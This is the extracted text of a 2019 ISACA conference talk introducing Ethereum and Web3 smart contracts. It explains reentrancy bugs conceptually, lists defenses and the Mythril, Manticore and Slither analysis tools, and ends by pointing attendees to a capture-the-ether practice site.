Close Encounters of the Third Web

Dean Pierce

ISACA June 2019

Who let this guy in the building?

• Gave my first DEF CON talk in 2005
• pdx.edu infosec 2005-2007
• Weird crypto stuff 2007-2010
• Intel Open Source Technology Center security 2010-2016
• Intel Red Team 2016-2018
• ConsenSys Diligence 2018-present

In the news

• Google announces partnership with ChainLink
• Facebook announces new cryptocurrency "Libra".
• Cloudflare announces launch of new Ethereum gateways.

Where are we at?

• Who has heard of Bitcoin?
• Who has ever owned any bitcoin?
• Who has heard of Ethereum?
• Who has made transactions on the Ethereum network?
• Who has developed Ethereum applications?

BLOCKCHAIN!

What is Web3?

What is Web3?

Web3 is a new model for building web applications where data and business logic are stored in a globally distributed ledger rather than on any particular server.

What's all this then?

• Magic sky computer.
• Ethereum is everywhere, anyone can run a node, nodes have the data.
• Mainnet is a thing, also Testnets: Kovan, Rinkby, Ropsten..
• Can push "contracts" onto the network.
• Anyone can execute functions on the contracts.
• Reading any data is free, but writing might cost a few cents.
• The blockchain becomes the backend.
• Authorities have been unsuccessful in arresting smart contracts.

A Stupid Example

A Stupid Example

A Stupid Example

A Stupid Example

A Stupid Example

A Stupid Example

• Download MetaMask
• set it all up
• switch to the "Ropsten" network
• Go to kik.to/stupidcode to get source code for contract.
• Check out deployed contract at kik.to/stupidcontract.
• Load the contract code into remix.ethereum.org.
• Run > At Address > 0xc3302466aa628804607820bc8c40dd791c4b6d0c
• Add a stupid thing to the list of other stupid things!
• MANDATORY FUN TIME!

A Stupid Example

• But why is this so future?
• Could this actually be something useful?
• I hate paying for servers!

A Stupid Example

• But why is this so future?
• Could this actually be something useful?
• I hate paying for servers!

​

HTTP://STUPID.SITE

OMG JAVASCRIPT

What about hacking?

• A very common bug for looting is "Reentrancy".
• Contracts can send ETH to each other and to normal addresses.
• Regular addresses and contract addresses are very hard to distinguish.
• Sending ETH to a contract executes its "fallback function".

​

If you can get a contract to send ETH to an arbitrary address, you may be able to create a malicious contract with a "fallback function" that reaches back into the vulnerable contract, and does nasty things.

"Stop hitting yourself"

WTF Remix?

Yay Reentrancy!

Yay Reentrancy!

Malicious Smart Contracts

Malicious Smart Contracts

Pure Pwnage

Defense against the Dark Arts

• send() and transfer() functions are now nerfed with hard "gas limits" that in theory only give them enough gas to complete an ETH transfer.
• The SpankChain hack (Oct 9, 2018) bypassed the transfer restriction, so the protections aren't perfect!
• Lots of contracts still use call, or directly execute functions on contracts passed in by the user, which you can overwrite with whatever you want.

Hacking is hard, what about tools?

pip3 install mythril

myth -x target.sol

pip3 install manticore

manticore --detect-all target.sol

pip3 install slither-analyzer

slither target.sol

Fuzzing

Honeypot Contracts

Frontrunning

Learn you a haxing!

For the next couple hours, we will be playing with

​

https://capturetheether.com

sweet prizes for people who get 500 points first!